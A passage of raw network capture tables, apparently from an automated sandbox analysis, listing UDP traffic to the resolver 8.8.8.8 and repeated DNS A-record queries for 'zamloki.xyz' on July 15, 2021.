                                      Jul 15, 2021 12:43:58.891779900 CEST53587848.8.8.8192.168.2.3
                                      Jul 15, 2021 12:43:59.405767918 CEST6397853192.168.2.38.8.8.8
                                      Jul 15, 2021 12:43:59.418761015 CEST53639788.8.8.8192.168.2.3
                                      Jul 15, 2021 12:43:59.971302032 CEST6293853192.168.2.38.8.8.8
                                      Jul 15, 2021 12:43:59.984743118 CEST53629388.8.8.8192.168.2.3
                                      Jul 15, 2021 12:44:00.512823105 CEST5570853192.168.2.38.8.8.8
                                      Jul 15, 2021 12:44:00.527525902 CEST53557088.8.8.8192.168.2.3
                                      Jul 15, 2021 12:44:01.041670084 CEST5680353192.168.2.38.8.8.8
                                      Jul 15, 2021 12:44:01.055779934 CEST53568038.8.8.8192.168.2.3
                                      Jul 15, 2021 12:44:01.655849934 CEST5714553192.168.2.38.8.8.8
                                      Jul 15, 2021 12:44:01.668643951 CEST53571458.8.8.8192.168.2.3
                                      Jul 15, 2021 12:44:02.289863110 CEST5535953192.168.2.38.8.8.8
                                      Jul 15, 2021 12:44:02.305361986 CEST53553598.8.8.8192.168.2.3
                                      Jul 15, 2021 12:44:02.835063934 CEST5830653192.168.2.38.8.8.8
                                      Jul 15, 2021 12:44:02.848674059 CEST53583068.8.8.8192.168.2.3
                                      Jul 15, 2021 12:44:03.681348085 CEST6412453192.168.2.38.8.8.8
                                      Jul 15, 2021 12:44:03.695089102 CEST53641248.8.8.8192.168.2.3
                                      Jul 15, 2021 12:44:04.215955973 CEST4936153192.168.2.38.8.8.8
                                      Jul 15, 2021 12:44:04.232584953 CEST53493618.8.8.8192.168.2.3
                                      Jul 15, 2021 12:44:04.755199909 CEST6315053192.168.2.38.8.8.8
                                      Jul 15, 2021 12:44:04.768723965 CEST53631508.8.8.8192.168.2.3
                                      Jul 15, 2021 12:44:05.398283958 CEST5327953192.168.2.38.8.8.8
                                      Jul 15, 2021 12:44:05.412250042 CEST53532798.8.8.8192.168.2.3
                                      Jul 15, 2021 12:44:05.980765104 CEST5688153192.168.2.38.8.8.8
                                      Jul 15, 2021 12:44:05.994390011 CEST53568818.8.8.8192.168.2.3
                                      Jul 15, 2021 12:44:06.512384892 CEST5364253192.168.2.38.8.8.8
                                      Jul 15, 2021 12:44:06.525233984 CEST53536428.8.8.8192.168.2.3
                                      Jul 15, 2021 12:44:07.006021023 CEST5566753192.168.2.38.8.8.8
                                      Jul 15, 2021 12:44:07.034981012 CEST53556678.8.8.8192.168.2.3
                                      Jul 15, 2021 12:44:07.143323898 CEST5483353192.168.2.38.8.8.8
                                      Jul 15, 2021 12:44:07.156969070 CEST53548338.8.8.8192.168.2.3
                                      Jul 15, 2021 12:44:07.688111067 CEST6247653192.168.2.38.8.8.8
                                      Jul 15, 2021 12:44:07.701777935 CEST53624768.8.8.8192.168.2.3
                                      Jul 15, 2021 12:44:08.253142118 CEST4970553192.168.2.38.8.8.8
                                      Jul 15, 2021 12:44:08.265764952 CEST53497058.8.8.8192.168.2.3
                                      Jul 15, 2021 12:44:08.790771008 CEST6147753192.168.2.38.8.8.8
                                      Jul 15, 2021 12:44:08.804574013 CEST53614778.8.8.8192.168.2.3
                                      Jul 15, 2021 12:44:09.342583895 CEST6163353192.168.2.38.8.8.8
                                      Jul 15, 2021 12:44:09.356261969 CEST53616338.8.8.8192.168.2.3
                                      Jul 15, 2021 12:44:09.885279894 CEST5594953192.168.2.38.8.8.8
                                      Jul 15, 2021 12:44:09.898235083 CEST53559498.8.8.8192.168.2.3
                                      Jul 15, 2021 12:44:10.428159952 CEST5760153192.168.2.38.8.8.8
                                      Jul 15, 2021 12:44:10.441601038 CEST53576018.8.8.8192.168.2.3
                                      Jul 15, 2021 12:44:11.037014961 CEST4934253192.168.2.38.8.8.8
                                      Jul 15, 2021 12:44:11.049803972 CEST53493428.8.8.8192.168.2.3
                                      Jul 15, 2021 12:44:11.560117006 CEST5625353192.168.2.38.8.8.8
                                      Jul 15, 2021 12:44:11.572421074 CEST53562538.8.8.8192.168.2.3
                                      Jul 15, 2021 12:44:12.267601967 CEST4966753192.168.2.38.8.8.8
                                      Jul 15, 2021 12:44:12.281625032 CEST53496678.8.8.8192.168.2.3
                                      Jul 15, 2021 12:44:12.828362942 CEST5543953192.168.2.38.8.8.8
                                      Jul 15, 2021 12:44:12.842216015 CEST53554398.8.8.8192.168.2.3
                                      Jul 15, 2021 12:44:12.892936945 CEST5706953192.168.2.38.8.8.8
                                      Jul 15, 2021 12:44:12.910775900 CEST53570698.8.8.8192.168.2.3
                                      Jul 15, 2021 12:44:13.382877111 CEST5765953192.168.2.38.8.8.8
                                      Jul 15, 2021 12:44:13.395761013 CEST53576598.8.8.8192.168.2.3
                                      Jul 15, 2021 12:44:13.990947008 CEST5471753192.168.2.38.8.8.8
                                      Jul 15, 2021 12:44:14.010463953 CEST53547178.8.8.8192.168.2.3
                                      Jul 15, 2021 12:44:14.626132965 CEST6397553192.168.2.38.8.8.8
                                      Jul 15, 2021 12:44:14.642564058 CEST53639758.8.8.8192.168.2.3
                                      Jul 15, 2021 12:44:15.136425972 CEST5663953192.168.2.38.8.8.8
                                      Jul 15, 2021 12:44:15.149255037 CEST53566398.8.8.8192.168.2.3
                                      Jul 15, 2021 12:44:15.629188061 CEST5185653192.168.2.38.8.8.8
                                      Jul 15, 2021 12:44:15.642895937 CEST53518568.8.8.8192.168.2.3
                                      Jul 15, 2021 12:44:16.154304981 CEST5654653192.168.2.38.8.8.8
                                      Jul 15, 2021 12:44:16.168962002 CEST53565468.8.8.8192.168.2.3
                                      Jul 15, 2021 12:44:16.673695087 CEST6215253192.168.2.38.8.8.8
                                      Jul 15, 2021 12:44:16.687606096 CEST53621528.8.8.8192.168.2.3
                                      Jul 15, 2021 12:44:17.362986088 CEST5347053192.168.2.38.8.8.8
                                      Jul 15, 2021 12:44:17.376025915 CEST53534708.8.8.8192.168.2.3
                                      Jul 15, 2021 12:44:17.878925085 CEST5644653192.168.2.38.8.8.8
                                      Jul 15, 2021 12:44:17.891642094 CEST53564468.8.8.8192.168.2.3
                                      Jul 15, 2021 12:44:18.371779919 CEST5963153192.168.2.38.8.8.8
                                      Jul 15, 2021 12:44:18.385477066 CEST53596318.8.8.8192.168.2.3
                                      Jul 15, 2021 12:44:18.890013933 CEST5551553192.168.2.38.8.8.8
                                      Jul 15, 2021 12:44:18.903363943 CEST53555158.8.8.8192.168.2.3
                                      Jul 15, 2021 12:44:19.454742908 CEST6454753192.168.2.38.8.8.8
                                      Jul 15, 2021 12:44:19.467612982 CEST53645478.8.8.8192.168.2.3
                                      Jul 15, 2021 12:44:19.963056087 CEST5175953192.168.2.38.8.8.8
                                      Jul 15, 2021 12:44:19.979599953 CEST53517598.8.8.8192.168.2.3
                                      Jul 15, 2021 12:44:20.470415115 CEST5920753192.168.2.38.8.8.8
                                      Jul 15, 2021 12:44:20.483789921 CEST53592078.8.8.8192.168.2.3
                                      Jul 15, 2021 12:44:21.020103931 CEST5426953192.168.2.38.8.8.8
                                      Jul 15, 2021 12:44:21.036919117 CEST53542698.8.8.8192.168.2.3
                                      Jul 15, 2021 12:44:21.610157013 CEST5485653192.168.2.38.8.8.8
                                      Jul 15, 2021 12:44:21.623914003 CEST53548568.8.8.8192.168.2.3
                                      Jul 15, 2021 12:44:22.141813040 CEST6414053192.168.2.38.8.8.8
                                      Jul 15, 2021 12:44:22.154730082 CEST53641408.8.8.8192.168.2.3
                                      Jul 15, 2021 12:44:22.642144918 CEST6227153192.168.2.38.8.8.8
                                      Jul 15, 2021 12:44:22.655612946 CEST53622718.8.8.8192.168.2.3
                                      Jul 15, 2021 12:44:23.148901939 CEST5740453192.168.2.38.8.8.8
                                      Jul 15, 2021 12:44:23.161600113 CEST53574048.8.8.8192.168.2.3
                                      Jul 15, 2021 12:44:23.678610086 CEST6299753192.168.2.38.8.8.8
                                      Jul 15, 2021 12:44:23.693172932 CEST53629978.8.8.8192.168.2.3
                                      Jul 15, 2021 12:44:24.211297989 CEST5771253192.168.2.38.8.8.8
                                      Jul 15, 2021 12:44:24.224226952 CEST53577128.8.8.8192.168.2.3
                                      Jul 15, 2021 12:44:24.743802071 CEST6006553192.168.2.38.8.8.8
                                      Jul 15, 2021 12:44:24.758142948 CEST53600658.8.8.8192.168.2.3
                                      Jul 15, 2021 12:44:25.247539997 CEST5506853192.168.2.38.8.8.8
                                      Jul 15, 2021 12:44:25.261136055 CEST53550688.8.8.8192.168.2.3
                                      Jul 15, 2021 12:44:25.740283966 CEST6470053192.168.2.38.8.8.8
                                      Jul 15, 2021 12:44:25.753865004 CEST53647008.8.8.8192.168.2.3
                                      Jul 15, 2021 12:44:26.315442085 CEST6199853192.168.2.38.8.8.8
                                      Jul 15, 2021 12:44:26.327507019 CEST53619988.8.8.8192.168.2.3
                                      Jul 15, 2021 12:44:26.862411022 CEST5372453192.168.2.38.8.8.8
                                      Jul 15, 2021 12:44:26.875633001 CEST53537248.8.8.8192.168.2.3
                                      Jul 15, 2021 12:44:27.410389900 CEST5232853192.168.2.38.8.8.8
                                      Jul 15, 2021 12:44:27.423202991 CEST53523288.8.8.8192.168.2.3
                                      Jul 15, 2021 12:44:27.985253096 CEST5805153192.168.2.38.8.8.8
                                      Jul 15, 2021 12:44:27.998087883 CEST53580518.8.8.8192.168.2.3
                                      Jul 15, 2021 12:44:28.535154104 CEST6413053192.168.2.38.8.8.8
                                      Jul 15, 2021 12:44:28.547930002 CEST53641308.8.8.8192.168.2.3
                                      Jul 15, 2021 12:44:29.364028931 CEST5049153192.168.2.38.8.8.8
                                      Jul 15, 2021 12:44:29.379895926 CEST53504918.8.8.8192.168.2.3
                                      Jul 15, 2021 12:44:29.928497076 CEST5300453192.168.2.38.8.8.8
                                      Jul 15, 2021 12:44:29.941210032 CEST53530048.8.8.8192.168.2.3
                                      Jul 15, 2021 12:44:30.769480944 CEST5252953192.168.2.38.8.8.8
                                      Jul 15, 2021 12:44:30.782937050 CEST53525298.8.8.8192.168.2.3
                                      Jul 15, 2021 12:44:31.275645971 CEST5365653192.168.2.38.8.8.8
                                      Jul 15, 2021 12:44:31.288299084 CEST53536568.8.8.8192.168.2.3
                                      Jul 15, 2021 12:44:31.790925026 CEST6272453192.168.2.38.8.8.8
                                      Jul 15, 2021 12:44:31.806317091 CEST53627248.8.8.8192.168.2.3
                                      Jul 15, 2021 12:44:32.329803944 CEST5605953192.168.2.38.8.8.8
                                      Jul 15, 2021 12:44:32.341964960 CEST53560598.8.8.8192.168.2.3
                                      Jul 15, 2021 12:44:32.874526024 CEST6306053192.168.2.38.8.8.8
                                      Jul 15, 2021 12:44:32.887413979 CEST53630608.8.8.8192.168.2.3
                                      Jul 15, 2021 12:44:33.400223017 CEST5149853192.168.2.38.8.8.8
                                      Jul 15, 2021 12:44:33.413608074 CEST53514988.8.8.8192.168.2.3
                                      Jul 15, 2021 12:44:33.914679050 CEST5994353192.168.2.38.8.8.8
                                      Jul 15, 2021 12:44:33.927614927 CEST53599438.8.8.8192.168.2.3
                                      Jul 15, 2021 12:44:34.422029018 CEST5011853192.168.2.38.8.8.8
                                      Jul 15, 2021 12:44:34.435470104 CEST53501188.8.8.8192.168.2.3
                                      Jul 15, 2021 12:44:34.950021029 CEST5835753192.168.2.38.8.8.8
                                      Jul 15, 2021 12:44:34.962716103 CEST53583578.8.8.8192.168.2.3
                                      Jul 15, 2021 12:44:35.469222069 CEST5580453192.168.2.38.8.8.8
                                      Jul 15, 2021 12:44:35.482784986 CEST53558048.8.8.8192.168.2.3
                                      Jul 15, 2021 12:44:36.071940899 CEST5807953192.168.2.38.8.8.8
                                      Jul 15, 2021 12:44:36.084111929 CEST53580798.8.8.8192.168.2.3
                                      Jul 15, 2021 12:44:36.586363077 CEST5208053192.168.2.38.8.8.8
                                      Jul 15, 2021 12:44:36.600025892 CEST53520808.8.8.8192.168.2.3
                                      Jul 15, 2021 12:44:37.102833986 CEST5523853192.168.2.38.8.8.8
                                      Jul 15, 2021 12:44:37.115880966 CEST53552388.8.8.8192.168.2.3
                                      Jul 15, 2021 12:44:37.754165888 CEST4928953192.168.2.38.8.8.8
                                      Jul 15, 2021 12:44:37.768765926 CEST53492898.8.8.8192.168.2.3
                                      Jul 15, 2021 12:44:38.274534941 CEST6103453192.168.2.38.8.8.8
                                      Jul 15, 2021 12:44:38.287544012 CEST53610348.8.8.8192.168.2.3
                                      Jul 15, 2021 12:44:38.803870916 CEST5196453192.168.2.38.8.8.8
                                      Jul 15, 2021 12:44:38.817277908 CEST53519648.8.8.8192.168.2.3
                                      Jul 15, 2021 12:44:39.364772081 CEST5824153192.168.2.38.8.8.8
                                      Jul 15, 2021 12:44:39.378170013 CEST53582418.8.8.8192.168.2.3
                                      Jul 15, 2021 12:44:40.175919056 CEST5957153192.168.2.38.8.8.8
                                      Jul 15, 2021 12:44:40.188589096 CEST53595718.8.8.8192.168.2.3
                                      Jul 15, 2021 12:44:40.810349941 CEST5170853192.168.2.38.8.8.8
                                      Jul 15, 2021 12:44:40.823302031 CEST53517088.8.8.8192.168.2.3
                                      Jul 15, 2021 12:44:41.883888960 CEST6070953192.168.2.38.8.8.8
                                      Jul 15, 2021 12:44:41.895956993 CEST53607098.8.8.8192.168.2.3
                                      Jul 15, 2021 12:44:43.161122084 CEST6364353192.168.2.38.8.8.8
                                      Jul 15, 2021 12:44:43.175436020 CEST53636438.8.8.8192.168.2.3
                                      Jul 15, 2021 12:44:43.704900980 CEST6282353192.168.2.38.8.8.8
                                      Jul 15, 2021 12:44:43.717622042 CEST53628238.8.8.8192.168.2.3
                                      Jul 15, 2021 12:44:44.203610897 CEST6375053192.168.2.38.8.8.8
                                      Jul 15, 2021 12:44:44.216659069 CEST53637508.8.8.8192.168.2.3
                                      Jul 15, 2021 12:44:44.701412916 CEST6195953192.168.2.38.8.8.8
                                      Jul 15, 2021 12:44:44.714206934 CEST53619598.8.8.8192.168.2.3
                                      Jul 15, 2021 12:44:44.820888996 CEST6355453192.168.2.38.8.8.8
                                      Jul 15, 2021 12:44:44.834240913 CEST53635548.8.8.8192.168.2.3
                                      Jul 15, 2021 12:44:45.219660044 CEST5772353192.168.2.38.8.8.8
                                      Jul 15, 2021 12:44:45.232325077 CEST53577238.8.8.8192.168.2.3
                                      Jul 15, 2021 12:44:45.751689911 CEST5866353192.168.2.38.8.8.8
                                      Jul 15, 2021 12:44:45.764659882 CEST53586638.8.8.8192.168.2.3
                                      Jul 15, 2021 12:44:46.267385006 CEST5098053192.168.2.38.8.8.8
                                      Jul 15, 2021 12:44:46.280395985 CEST53509808.8.8.8192.168.2.3
                                      Jul 15, 2021 12:44:46.746701002 CEST5006753192.168.2.38.8.8.8
                                      Jul 15, 2021 12:44:46.767110109 CEST5299253192.168.2.38.8.8.8
                                      Jul 15, 2021 12:44:46.773669004 CEST53500678.8.8.8192.168.2.3
                                      Jul 15, 2021 12:44:46.779916048 CEST53529928.8.8.8192.168.2.3
                                      Jul 15, 2021 12:44:47.285147905 CEST5512953192.168.2.38.8.8.8
                                      Jul 15, 2021 12:44:47.298109055 CEST53551298.8.8.8192.168.2.3
                                      Jul 15, 2021 12:44:47.839428902 CEST6095953192.168.2.38.8.8.8
                                      Jul 15, 2021 12:44:47.851485014 CEST53609598.8.8.8192.168.2.3
                                      Jul 15, 2021 12:44:48.374926090 CEST5831953192.168.2.38.8.8.8
                                      Jul 15, 2021 12:44:48.387482882 CEST53583198.8.8.8192.168.2.3
                                      Jul 15, 2021 12:44:48.876656055 CEST6478553192.168.2.38.8.8.8
                                      Jul 15, 2021 12:44:48.888705969 CEST53647858.8.8.8192.168.2.3
                                      Jul 15, 2021 12:44:49.410851002 CEST5020853192.168.2.38.8.8.8
                                      Jul 15, 2021 12:44:49.424396992 CEST53502088.8.8.8192.168.2.3
                                      Jul 15, 2021 12:44:49.904887915 CEST6247753192.168.2.38.8.8.8
                                      Jul 15, 2021 12:44:49.917669058 CEST53624778.8.8.8192.168.2.3
                                      Jul 15, 2021 12:44:50.419938087 CEST5446753192.168.2.38.8.8.8
                                      Jul 15, 2021 12:44:50.431998968 CEST53544678.8.8.8192.168.2.3
                                      Jul 15, 2021 12:44:50.957070112 CEST6054853192.168.2.38.8.8.8
                                      Jul 15, 2021 12:44:50.970931053 CEST53605488.8.8.8192.168.2.3
                                      Jul 15, 2021 12:44:51.492249966 CEST5962353192.168.2.38.8.8.8
                                      Jul 15, 2021 12:44:51.504997969 CEST53596238.8.8.8192.168.2.3
                                      Jul 15, 2021 12:44:52.000727892 CEST5168953192.168.2.38.8.8.8
                                      Jul 15, 2021 12:44:52.013833046 CEST53516898.8.8.8192.168.2.3
                                      Jul 15, 2021 12:44:52.541213989 CEST6480653192.168.2.38.8.8.8
                                      Jul 15, 2021 12:44:52.554482937 CEST53648068.8.8.8192.168.2.3
                                      Jul 15, 2021 12:44:53.039995909 CEST4968653192.168.2.38.8.8.8
                                      Jul 15, 2021 12:44:53.052774906 CEST53496868.8.8.8192.168.2.3
                                      Jul 15, 2021 12:44:53.573863029 CEST5619553192.168.2.38.8.8.8
                                      Jul 15, 2021 12:44:53.586507082 CEST53561958.8.8.8192.168.2.3
                                      Jul 15, 2021 12:44:54.081576109 CEST6224153192.168.2.38.8.8.8
                                      Jul 15, 2021 12:44:54.095200062 CEST53622418.8.8.8192.168.2.3
                                      Jul 15, 2021 12:44:54.660336018 CEST5054353192.168.2.38.8.8.8
                                      Jul 15, 2021 12:44:54.673021078 CEST53505438.8.8.8192.168.2.3
                                      Jul 15, 2021 12:44:55.156505108 CEST5644553192.168.2.38.8.8.8
                                      Jul 15, 2021 12:44:55.169157982 CEST53564458.8.8.8192.168.2.3
                                      Jul 15, 2021 12:44:55.671787977 CEST5670953192.168.2.38.8.8.8
                                      Jul 15, 2021 12:44:55.684447050 CEST53567098.8.8.8192.168.2.3
                                      Jul 15, 2021 12:44:56.172998905 CEST5124853192.168.2.38.8.8.8
                                      Jul 15, 2021 12:44:56.184940100 CEST53512488.8.8.8192.168.2.3
                                      Jul 15, 2021 12:44:56.679073095 CEST4967953192.168.2.38.8.8.8
                                      Jul 15, 2021 12:44:56.691792965 CEST53496798.8.8.8192.168.2.3
                                      Jul 15, 2021 12:44:57.171515942 CEST5026353192.168.2.38.8.8.8
                                      Jul 15, 2021 12:44:57.184271097 CEST53502638.8.8.8192.168.2.3
                                      Jul 15, 2021 12:44:57.691869020 CEST4921553192.168.2.38.8.8.8
                                      Jul 15, 2021 12:44:57.705969095 CEST53492158.8.8.8192.168.2.3
                                      Jul 15, 2021 12:44:58.227463007 CEST6437253192.168.2.38.8.8.8
                                      Jul 15, 2021 12:44:58.240128994 CEST53643728.8.8.8192.168.2.3
                                      Jul 15, 2021 12:44:58.762233973 CEST5001653192.168.2.38.8.8.8
                                      Jul 15, 2021 12:44:58.775551081 CEST53500168.8.8.8192.168.2.3
                                      Jul 15, 2021 12:44:59.274435997 CEST6132553192.168.2.38.8.8.8
                                      Jul 15, 2021 12:44:59.289829969 CEST53613258.8.8.8192.168.2.3
                                      Jul 15, 2021 12:44:59.773226976 CEST4916053192.168.2.38.8.8.8
                                      Jul 15, 2021 12:44:59.785984993 CEST53491608.8.8.8192.168.2.3
                                      Jul 15, 2021 12:45:00.275674105 CEST5126553192.168.2.38.8.8.8
                                      Jul 15, 2021 12:45:00.288418055 CEST53512658.8.8.8192.168.2.3
                                      Jul 15, 2021 12:45:00.799334049 CEST5200653192.168.2.38.8.8.8
                                      Jul 15, 2021 12:45:00.812108994 CEST53520068.8.8.8192.168.2.3
                                      Jul 15, 2021 12:45:01.333152056 CEST5869753192.168.2.38.8.8.8
                                      Jul 15, 2021 12:45:01.345877886 CEST53586978.8.8.8192.168.2.3
                                      Jul 15, 2021 12:45:01.941364050 CEST5153053192.168.2.38.8.8.8
                                      Jul 15, 2021 12:45:01.953919888 CEST53515308.8.8.8192.168.2.3
                                      Jul 15, 2021 12:45:02.723032951 CEST5098953192.168.2.38.8.8.8
                                      Jul 15, 2021 12:45:02.735788107 CEST53509898.8.8.8192.168.2.3
                                      Jul 15, 2021 12:45:03.674669027 CEST5332353192.168.2.38.8.8.8
                                      Jul 15, 2021 12:45:03.686865091 CEST53533238.8.8.8192.168.2.3
                                      Jul 15, 2021 12:45:04.364547968 CEST5903453192.168.2.38.8.8.8
                                      Jul 15, 2021 12:45:04.376971960 CEST53590348.8.8.8192.168.2.3
                                      Jul 15, 2021 12:45:04.892307997 CEST5310653192.168.2.38.8.8.8
                                      Jul 15, 2021 12:45:04.906169891 CEST53531068.8.8.8192.168.2.3
                                      Jul 15, 2021 12:45:05.424576998 CEST6213253192.168.2.38.8.8.8
                                      Jul 15, 2021 12:45:05.437347889 CEST53621328.8.8.8192.168.2.3
                                      Jul 15, 2021 12:45:05.996809006 CEST5448953192.168.2.38.8.8.8
                                      Jul 15, 2021 12:45:06.013479948 CEST53544898.8.8.8192.168.2.3

                                      DNS Queries

                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                      Jul 15, 2021 12:43:47.827604055 CEST192.168.2.38.8.8.80x28bcStandard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                      Jul 15, 2021 12:43:48.392527103 CEST192.168.2.38.8.8.80x2f99Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                      Jul 15, 2021 12:43:48.819869995 CEST192.168.2.38.8.8.80xcd55Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                      Jul 15, 2021 12:43:49.451843023 CEST192.168.2.38.8.8.80x9415Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                      Jul 15, 2021 12:43:50.076349020 CEST192.168.2.38.8.8.80xd5f1Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                      Jul 15, 2021 12:43:50.912091970 CEST192.168.2.38.8.8.80x8a87Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                      Jul 15, 2021 12:43:51.491405010 CEST192.168.2.38.8.8.80xb07bStandard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                      Jul 15, 2021 12:43:52.616329908 CEST192.168.2.38.8.8.80x98cdStandard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                      Jul 15, 2021 12:43:54.146442890 CEST192.168.2.38.8.8.80x6ba6Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                      Jul 15, 2021 12:43:54.729552031 CEST192.168.2.38.8.8.80xf859Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                      Jul 15, 2021 12:43:55.242336035 CEST192.168.2.38.8.8.80x2c03Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                      Jul 15, 2021 12:43:55.956191063 CEST192.168.2.38.8.8.80x3efStandard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                      Jul 15, 2021 12:43:56.516213894 CEST192.168.2.38.8.8.80x57c7Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                      Jul 15, 2021 12:43:57.095279932 CEST192.168.2.38.8.8.80xd8c9Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                      Jul 15, 2021 12:43:57.681431055 CEST192.168.2.38.8.8.80xe506Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                      Jul 15, 2021 12:43:58.220237970 CEST192.168.2.38.8.8.80x4b72Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                      Jul 15, 2021 12:43:58.878668070 CEST192.168.2.38.8.8.80x326bStandard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                      Jul 15, 2021 12:43:59.405767918 CEST192.168.2.38.8.8.80xcb51Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                      Jul 15, 2021 12:43:59.971302032 CEST192.168.2.38.8.8.80x6e9aStandard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:00.512823105 CEST192.168.2.38.8.8.80xa3aStandard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:01.041670084 CEST192.168.2.38.8.8.80x7e2fStandard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:01.655849934 CEST192.168.2.38.8.8.80xc225Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:02.289863110 CEST192.168.2.38.8.8.80x4b68Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:02.835063934 CEST192.168.2.38.8.8.80xefdcStandard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:03.681348085 CEST192.168.2.38.8.8.80x435cStandard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:04.215955973 CEST192.168.2.38.8.8.80xc01fStandard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:04.755199909 CEST192.168.2.38.8.8.80x3ec0Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:05.398283958 CEST192.168.2.38.8.8.80x64f2Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:05.980765104 CEST192.168.2.38.8.8.80x9ba4Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:06.512384892 CEST192.168.2.38.8.8.80x730eStandard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:07.143323898 CEST192.168.2.38.8.8.80xae90Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:07.688111067 CEST192.168.2.38.8.8.80xdd1aStandard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:08.253142118 CEST192.168.2.38.8.8.80x1fe4Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:08.790771008 CEST192.168.2.38.8.8.80x2ac9Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:09.342583895 CEST192.168.2.38.8.8.80x278bStandard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:09.885279894 CEST192.168.2.38.8.8.80x2027Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:10.428159952 CEST192.168.2.38.8.8.80xcca9Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:11.037014961 CEST192.168.2.38.8.8.80xb098Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:11.560117006 CEST192.168.2.38.8.8.80xa00dStandard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:12.267601967 CEST192.168.2.38.8.8.80x6376Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:12.828362942 CEST192.168.2.38.8.8.80x5bbStandard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:13.382877111 CEST192.168.2.38.8.8.80x2e5eStandard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:13.990947008 CEST192.168.2.38.8.8.80xffe9Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:14.626132965 CEST192.168.2.38.8.8.80xeffeStandard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:15.136425972 CEST192.168.2.38.8.8.80x2af0Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:15.629188061 CEST192.168.2.38.8.8.80x6caaStandard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:16.154304981 CEST192.168.2.38.8.8.80x2020Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:16.673695087 CEST192.168.2.38.8.8.80x243aStandard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:17.362986088 CEST192.168.2.38.8.8.80x238bStandard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:17.878925085 CEST192.168.2.38.8.8.80x54aeStandard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:18.371779919 CEST192.168.2.38.8.8.80xaa59Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:18.890013933 CEST192.168.2.38.8.8.80xe892Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:19.454742908 CEST192.168.2.38.8.8.80xecf4Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:19.963056087 CEST192.168.2.38.8.8.80x9d95Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:20.470415115 CEST192.168.2.38.8.8.80x663cStandard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:21.020103931 CEST192.168.2.38.8.8.80xe54Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:21.610157013 CEST192.168.2.38.8.8.80x2524Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:22.141813040 CEST192.168.2.38.8.8.80xbbffStandard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:22.642144918 CEST192.168.2.38.8.8.80xc82Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:23.148901939 CEST192.168.2.38.8.8.80x62ebStandard query (0)zamloki.xyzA (IP address)IN (0x0001)
